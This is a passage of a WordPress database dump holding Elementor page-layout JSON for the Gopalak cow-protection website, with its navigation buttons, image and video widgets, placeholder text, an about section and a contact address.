:\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-18,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gopalak Values\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Service to all, Total integrity, Absolute commitment to quality, Respect and devotion to Mother Nature. No compromise on being who we are.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" 800\\nvivdhity ventures<br>Second floor,  HSR Layout<br>Bangalore 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: pavitra@gopalak.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(9894,1660,'_elementor_page_assets','a:0:{}'),(9896,1661,'_elementor_edit_mode','builder'),(9897,1661,'_elementor_template_type','wp-page'),(9898,1661,'_elementor_version','3.7.8'),(9899,1661,'_wp_page_template','elementor_canvas'),(9900,1661,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"80\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"woocommerce_single\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#006505\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b5a07d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"6a4419e\",\"elType\":\"widget\",\"settings\":{\"text\":\"Contact us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":12,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK555.png\",\"id\":1579,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false},\"background_slideshow_gallery\":[{\"id\":1654,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\"},{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1628,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Contribute-1234.png\"}],\"background_repeat\":\"no-repeat\",\"background_slideshow_slide_duration\":2000,\"content_width\":{\"unit\":\"px\",\"size\":1600,\"sizes\":[]}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":100,\"margin\":{\"unit\":\"px\",\"top\":\"16\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"192\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-17\",\"bottom\":\"0\",\"left\":\"-27\",\"isLinked\":false}},\"elements\":[{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":47.722999999999999,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-1\",\"bottom\":\"0\",\"left\":\"-67\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"892627f\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"600\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":3.1000000000000001,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5c704bd\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"align\":\"center\",\"title_color\":\"#154833\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Roboto\",\"typography_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_letter_spacing\":{\"unit\":\"px\",\"size\":4.2000000000000002,\"sizes\":[]},\"typography_word_spacing\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb27b52\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true},{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":52.229999999999997,\"background_background\":\"classic\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"5\",\"isLinked\":false}},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/elementor-1626\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{